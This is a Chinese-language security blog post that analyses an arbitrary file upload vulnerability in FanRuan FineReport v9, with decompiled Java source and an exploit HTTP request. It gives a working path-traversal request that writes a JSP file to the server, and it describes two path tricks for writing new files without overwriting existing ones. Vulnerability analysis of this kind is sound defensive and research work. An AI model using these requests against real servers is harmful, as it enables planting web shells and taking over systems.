<!DOCTYPE html>
<html>
  <head>
<meta name="referrer" content="never">
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-CNTF3L2LQC"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-CNTF3L2LQC');
</script>  <script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?a2d27f70a2f1f5f5edfb5884096627ae";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script> 
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="keywords" content="" />
    <meta name="description" content="" />
    
    <title>
      帆软 v9任意文件上传漏洞分析 - 白帽酱の博客
    </title>
    <link rel="manifest" href="/manifest.json" />
    <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon" />
    
<link rel="stylesheet" href="/style/style.css">

  <meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="白帽酱の博客" type="application/atom+xml">
</head>
  <body>
    <canvas id='pagemap'></canvas>
    
    <div id="post-toc" class="animated hiddenToc hide">
      <span class="title">Toc</span>
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-text">分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E7%A7%8D%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-text">第一种利用方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E7%A7%8D%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-text">第二种利用方法</span></a></li></ol></li></ol>
    </div>
    
    <div id="fixed-menu-wrap">
      <span class="iconfont icon-sousuo search-box menu-reset"></span>
      <span class="icon-toc menu-reset">Toc</span>
      <span class="iconfont icon-arrowup menu-reset"></span>
    </div>
    <div id="fixed-menu">
      <span class="iconfont icon-menu-"></span>
    </div>
    <div id="progress">
      <div class="line"></div>
    </div>
    <div id="search-shade" class="animated hiddenSearch hide">
      <div class="input-wrap">
        <span class="iconfont icon-sousuo search-box"></span>
        <input type="text" placeholder="Search" />
        <span class="iconfont icon-close"></span>
      </div>
      <div class="search-result">
        <div class="meta">
          <span><b id="result-count">0</b> results found</span>
          <img src="/images/logo.jpeg" />
        </div>
        <ul id="result-box"></ul>
      </div>
    </div>
    <div id="menu-mask" class="animated hideMenuMask hide">
      <span class="iconfont icon-close"></span>
      <div class="nav">
        
        <a href="/" class="">
          首页
        </a>
        
        <a href="/archives" class="">
          归档
        </a>
        
        <a href="/categories" class="">
          分类
        </a>
        
        <a href="/tags" class="">
          标签
        </a>
        
        <a href="/friends" class="">
          友链
        </a>
        
        <a href="/about" class="">
          关于
        </a>
        
      </div>
    </div>
    <div id="header">
      <div class="intro">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <div class="author">白帽酱</div>
      </div>
      <div class="nav">
        <span class="iconfont icon-menu menu-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
    </div>
    <div id="side" class="animated bounceInLeft">
      <div class="shrink">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <span class="iconfont icon-menu toggle-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
      <div class="magnify">
        <div class="about">
          <div class="author">白帽酱</div>
          <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        </div>

        <div class="nav">
          
          <a href="/" class="">
            首页
          </a>
          
          <a href="/archives" class="">
            归档
          </a>
          
          <a href="/categories" class="">
            分类
          </a>
          
          <a href="/tags" class="">
            标签
          </a>
          
          <a href="/friends" class="">
            友链
          </a>
          
          <a href="/about" class="">
            关于
          </a>
          
          <a href="#" class="search-box">
            <span class="iconfont icon-sousuo"></span>
          </a>
        </div>
        <div class="bottom">
          <div class="follow">
            
            <a href="https://github.com/burpheart" target="_block">
              <span class="iconfont icon-github"></span>
            </a>
            
            <a href="https://twitter.com/burp_heart" target="_block">
              <span class="iconfont icon-twitter"></span>
            </a>
            
            <a href="https://space.bilibili.com/32890488" target="_block">
              <span class="iconfont icon-bilibili"></span>
            </a>
             
            <a href="/atom.xml" target="_block">
              <span class="iconfont icon-rss"></span>
            </a>
            
          </div>
        </div>
      </div>
    </div>
    <div id="container">
      <div class="main animated bounceInRight delay-0.7s">
        <article class="post-entry">
    <div class="header">
      
      <div class="title">帆软 v9任意文件上传漏洞分析</div>
      <div class="meta">
        <span class="item">
          <span class="iconfont icon-time-circle"></span>
          <span>2021/05/20</span>
        </span>

        

         
        <span class="item">
          <span class="iconfont icon-folder"></span>
          <span>
              
                
                  <a href="/categories/漏洞分析">漏洞分析</a>
                
              
          </span>
        </span>
        
        
         
          <span class="item">
            <span class="iconfont icon-tag1"></span>
            <span>
                
                  
                    <a href="/tags/漏洞分析">漏洞分析</a>
                  
                
            </span>
          </span>
         
      </div>
      <div>
      </div>
    </div>
    <html><head></head><body><h2 id="前言">前言<a class="post-anchor" href="#前言"></a></h2><p>好久没写博客了 博客源文件找不到了233 假期重新抄了下顺便换了个博客主题<br>经过简单的分析这个exp经过简单的修改即可不覆盖就可以成功上传文件 显而易见一堆人不分析就传exp 还说只能覆盖文件 今天又看到一篇一模一样的文章)</p>
<span id="more"></span>


<h2 id="分析">分析<a class="post-anchor" href="#分析"></a></h2><p>帆软官方提供了安装包下载地址 下载之<br><a target="_blank" rel="noopener" href="https://www.finereport.com/product/download">https://www.finereport.com/product/download</a><br>发现这是个java开发的web应用 先准备工具好工具反编译class<br>随手拿个网上给出的playload 看一下路由操作 op svginit,cmd design_save_svg</p>
<figure class="highlight plain"><table><tbody><tr><td class="code"><pre><code class="hljs plain">POST /WebReport/ReportServer?op=svginit&amp;cmd=design_save_svg&amp;filePath=chartmapsvg/../../../../WebReport/update.jsp  HTTP/1.1<br>Host: 192.168.10.1<br>Upgrade-Insecure-Requests: 1<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br>Accept-Encoding: gzip, deflate<br>Accept-Language: zh-CN,zh;q=0.9<br>Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE<br>Connection: close<br>Content-Type:text/xml;charset=UTF-8<br><br>Content-Length: 74<br><br>{"__CONTENT__":"&lt;%out.println(\"Hello World!\");%&gt;","__CHARSET__":"UTF-8"}<br></code></pre></td></tr></tbody></table></figure>

<p>经过搜索 发现存在漏洞的Service在WEB-INF\lib\fr-chart-9.0.jar内<br>\com\fr\chart\web\ChartSvgInitService.class 反编译之</p>
<figure class="highlight plain"><table><tbody><tr><td class="code"><pre><code class="hljs plain">package com.fr.chart.web;<br><br>import com.fr.stable.fun.Service;<br>import com.fr.stable.web.RequestCMDReceiver;<br>import com.fr.web.core.WebActionsDispatcher;<br>import javax.servlet.http.HttpServletRequest;<br>import javax.servlet.http.HttpServletResponse;<br><br>public class ChartSvgInitService implements Service {<br>    private RequestCMDReceiver[] actions = new RequestCMDReceiver[]{new ChartGetSvgAction(), new ChartSaveSvgAction(), new ChartDeleteSvgAction()};<br><br>    public ChartSvgInitService() {<br>    }<br><br>    public String actionOP() {<br>        return "svginit";<br>    }<br><br>    public void process(HttpServletRequest var1, HttpServletResponse var2, String var3, String var4) throws Exception {<br>        WebActionsDispatcher.dealForActionCMD(var1, var2, var4, this.actions);<br>    }<br>}<br></code></pre></td></tr></tbody></table></figure>
<p>显然要找的漏洞点在ChartSaveSvgAction内</p>
<figure class="highlight plain"><table><tbody><tr><td class="code"><pre><code class="hljs plain">package com.fr.chart.web;<br><br>import com.fr.base.Utils;<br>import com.fr.chart.base.MapSvgAttr;<br>import com.fr.chart.base.MapSvgXMLHelper;<br>import com.fr.general.GeneralContext;<br>import com.fr.general.http.HttpClient;<br>import com.fr.stable.StableUtils;<br>import com.fr.web.core.ActionNoSessionCMD;<br>import com.fr.web.utils.WebUtils;<br>import java.io.File;<br>import java.io.FileOutputStream;<br>import java.io.InputStream;<br>import javax.servlet.http.HttpServletRequest;<br>import javax.servlet.http.HttpServletResponse;<br><br>public class ChartSaveSvgAction extends ActionNoSessionCMD {<br>    public ChartSaveSvgAction() {<br>    }<br><br>    public void actionCMD(HttpServletRequest var1, HttpServletResponse var2, String var3) throws Exception {<br>        String var4 = WebUtils.getHTTPRequestParameter(var1, "filePath"); <br>        String var5 = GeneralContext.getEnvProvider().getPath() + "/" + "assets" + "/";<br>        var4 = var5 + var4.substring(var4.indexOf("chartmapsvg"));<br>        File var6 = null;<br>        if (var4.contains(".svg")) {<br>            var6 = new File(var4.substring(0, var4.lastIndexOf("/")));<br>        } else {<br>            var6 = new File(var4);<br>        }<br><br>        if (!var6.exists()) {<br>            var6.mkdirs();<br>        }<br><br>        InputStream var7 = HttpClient.getInputStream(var1);<br>        if (var7 != null) {<br>            FileOutputStream var8 = new FileOutputStream(var4);<br>            Utils.copyBinaryTo(var7, var8);<br>            String[] var9 = StableUtils.pathSplit(var4);<br>            String var10 = StableUtils.getFileNameWithOutPostfix(var9[var9.length - 1]);<br>            MapSvgXMLHelper.getInstance().pushMapAttr(var10, new MapSvgAttr(var4));<br>            var8.flush();<br>            var7.close();<br>            var8.close();<br>        }<br>    }<br><br>    public String getCMD() {<br>        return "design_save_svg";<br>    }<br>}<br></code></pre></td></tr></tbody></table></figure>

<p>这个action原本功能应该是上传保存svg图片<br>传入uri中的filePath参数的处理</p>
<figure class="highlight plain"><table><tbody><tr><td class="code"><pre><code class="hljs plain">String var4 = WebUtils.getHTTPRequestParameter(var1, “filePath”); // 首先传入uri中的filePath参数<br>String var5 = GeneralContext.getEnvProvider().getPath() + “/“ + “assets” + “/“; //取当前目录拼接成保存目录<br>var4 = var5 + var4.substring(var4.indexOf(“chartmapsvg”)); //取filePath中的chartmapsvg右侧的字符串与var5目录拼接<br></code></pre></td></tr></tbody></table></figure>
<p>var4 即为目标操作 目录/文件路径<br>这里有一个安全问题 输入filePath可控 可以构造目录穿越<br>那么为什么那么多人说这个漏洞只能覆盖文件呢 我们往下看</p>
<figure class="highlight plain"><table><tbody><tr><td class="code"><pre><code class="hljs plain">File var6 = null; //文件系统操作<br>if (var4.contains(“.svg”)) { //判断路径是否包含字符串.svg<br>var6 = new File(var4.substring(0, var4.lastIndexOf(“/“))); //如果包含 取最后一个/前面的字符串作为路径new一个File类<br>} else {<br>var6 = new File(var4); //如果不包含 直接用路径new一个File类<br>}<br>if (!var6.exists()) { //判断var6文件/文件夹是否存在<br>var6.mkdirs();//不存在则创建文件夹<br>}<br></code></pre></td></tr></tbody></table></figure>

<p>这个就是被认为该漏洞只能覆盖文件的原因<br>这处显然是实现文件夹创建的功能而写的<br>下面的代码就是把 _CONTENT_ 写入var6打开的路径中 就不赘述了</p>
<h3 id="第一种利用方法">第一种利用方法<a class="post-anchor" href="#第一种利用方法"></a></h3><p>下面最重要的来了<br>假设filePath 传入 chartmapsvg/123.jsp 则var6打开的路径为 当前环境变量目录/assets/123.jsp<br>假设123.jsp不存在 所以会创建一个123.jsp的文件夹<br>123.jsp就变成了一个文件夹了<br>因为123.jsp是文件夹所以不能当做文件打开写入数据 导致利用失败<br>如果123.jsp存在 就不会创建文件夹 直接写入数据 达到文件覆盖的目的<br>这个是网传EXP的利用方法</p>
<h3 id="第二种利用方法">第二种利用方法<a class="post-anchor" href="#第二种利用方法"></a></h3><p>其实还有另一种方法<br>仔细阅读代码发现</p>
<figure class="highlight plain"><table><tbody><tr><td class="code"><pre><code class="hljs plain">if (var4.contains(".svg")) {<br>var6 = new File(var4.substring(0, var4.lastIndexOf("/")));<br></code></pre></td></tr></tbody></table></figure>
<p>如果传入的路径包含.svg字符串 则判断和创建的将会是父文件夹<br>根据上面的判断条件就可以写出构造路径利用的第二种方法了<br>chartmapsvg/123.svg.jsp 父目录存在直接写入一个123.svg.jsp文件<br>chartmapsvg/.svg/123.jsp .svg目录不存在创建一个.svg文件夹 在文件夹下写入一个123.jsp文件<br>所以说为什么当时没有发现这种简单的方法却搞出个这种奇葩的利用)</p>
</body></html>

  
  <div class="post-guide">
    <div class="item left">
        
          <a href="/2021/06/08/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B%E6%98%A5%E5%AD%A3%E8%B5%9B-CTF-GameContract-WriteUp/">2021年春秋杯网络安全联赛春季赛-CTF-GameContract-WriteUp</a>
        
    </div>
    <div class="item right">
        
          <a href="/2021/05/05/chrome-%E6%B5%8F%E8%A7%88%E5%99%A8cookies-%E7%99%BB%E9%99%86%E5%87%AD%E6%8D%AE%E8%A7%A3%E5%AF%86-Windows%E7%B3%BB%E7%BB%9F%E4%B8%8BDPAPI%E4%B8%AD%E7%9A%84MasterKey%E8%8E%B7%E5%8F%96/">chrome 浏览器cookies&登陆凭据解密&Windows系统下DPAPI中的MasterKey获取</a>
        
    </div>
  </div>

  

  <div class="post-copyright">
    <div class="auth">
      本文作者：<a href="https://rce.moe">白帽酱</a>
    </div>
    <div class="link">
      永久链接：<a href="https://rce.moe/2021/05/20/fanruanupload/">https://rce.moe/2021/05/20/fanruanupload/</a>
    </div>
    <div class="declare">
      版权声明：本文首发于<a href="https://rce.moe">白帽酱</a>的博客，转载请注明出处！
    </div>
  </div>

  <div id="comment"></div>

  
  
</article>
<!--<div id="gitalk-container"></div>-->
<!--<link rel="stylesheet" href="https://unpkg.com/gitalk@latest/dist/gitalk.css">-->
<!--<script src="https://unpkg.com/gitalk@latest/dist/gitalk.min.js"></script>-->
<!--<script src="https://priesttomb.github.io/js/md5.min.js"></script>-->
<!--
<script type="text/javascript">
    new Gitalk({
        clientID: '1488ae49eda310270a91',
        clientSecret: '83e505f36d0351b0ef1a225d089546cb40ecd31a',
        repo: 'hexoblog',
        owner: 'burpheart',
        admin: 'burpheart',
        id: md5(location.pathname),
        distractionFreeMode: true,
        proxy: 'https://servelesscors.rce.moe/api/cors?url=https://github.com/login/oauth/access_token'
    }).render('gitalk-container')
-->
<div id="tcomment"></div>
<script src="https://cdn.jsdelivr.net/npm/twikoo@1.6.41/dist/twikoo.all.min.js"></script>
<script>
twikoo.init({
  envId: 'https://twikoo.rce.moe', // 腾讯云环境填 envId；Vercel 环境填地址（https://xxx.vercel.app）
  el: '#tcomment', // 容器元素
  // region: 'ap-guangzhou', // 环境地域，默认为 ap-shanghai，腾讯云环境填 ap-shanghai 或 ap-guangzhou；Vercel 环境不填
  // path: location.pathname, // 用于区分不同文章的自定义 js 路径，如果您的文章路径不是 location.pathname，需传此参数
  // lang: 'zh-CN', // 用于手动设定评论区语言，支持的语言列表 https://github.com/twikoojs/twikoo/blob/main/src/client/utils/i18n/index.js
})
</script>
</script>
        <footer>
          <div class="copyright">
            ©2025
            <a href="https://rce.moe">白帽酱</a> Powered by <a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a> |
            <a target="_blank" rel="noopener" href="https://github.com/shixiaohu2206/hexo-theme-huhu">hexo-theme-huhu</a>
          </div>
          
        </footer>
      </div>
    </div>
  </body>
  
</html>
<script type="text/javascript">
                  window.HUHU_CONFIG = JSON.parse("{\"share\":[\"weibo\",\"weixin\",\"qqkongjian\",\"QQ\",\"douban\",\"facebook\",\"twitter\",\"google\"],\"service_worker\":{\"open\":false}}")
                </script> <script type="text/javascript">window.addEventListener('load', function() {
    
    window.loadJs = function(d, m, a) {
      var c = document.getElementsByTagName('head')[0] || document.head || document.documentElement
      var b = document.createElement('script')
      b.defer = true
      b.setAttribute('type', 'text/javascript')
      b.setAttribute('charset', 'UTF-8')
      b.setAttribute('async', 'true')
      b.setAttribute('src', d)
      m && b.setAttribute('data-main', '/scripts/app-built')
      if (typeof a === 'function') {
        if (window.attachEvent) {
          b.onreadystatechange = function() {
            var e = b.readyState
            if (e === 'loaded' || e === 'complete') {
              b.onreadystatechange = null
              a()
            }
          }
        } else {
          b.onload = a
        }
      }
      c.appendChild(b)
    }
    window.loadJs && window.loadJs('https://cdn.bootcss.com/require.js/2.3.6/require.min.js', true, function() {require.config({"paths":{"util":"util","share":"share","search":"search","pagemap":"pagemap.min","registerSW":"registerSW","valine":"cdn/Valine.min","av":["https://cdn.jsdelivr.net/npm/leancloud-storage/dist/av-min"],"pjax":["https://cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min"],"jquery":["https://cdn.bootcss.com/jquery/3.4.1/jquery.min"],"confirm":["https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min"],"fancybox":["https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min"],"chart":["https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.bundle.min"]},"map":{"*":{"css":"https://cdn.bootcss.com/require-css/0.1.10/css.min.js"}},"shim":{"fancybox":{"deps":["css!https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css"]},"confirm":{"deps":["css!https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min.css"]},"chart":{"deps":["css!https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.min.css"]}},"waitSeconds":3})})
  })</script> <script type="text/javascript">
                  ;(function() {
                    var bp = document.createElement('script')
                    var curProtocol = window.location.protocol.split(':')[0]
                    if (curProtocol === 'https') {
                      bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'
                    } else {
                      bp.src = 'http://push.zhanzhang.baidu.com/push.js'
                    }
                    var s = document.getElementsByTagName('script')[0]
                    s.parentNode.insertBefore(bp, s)
                  })()
                </script> 
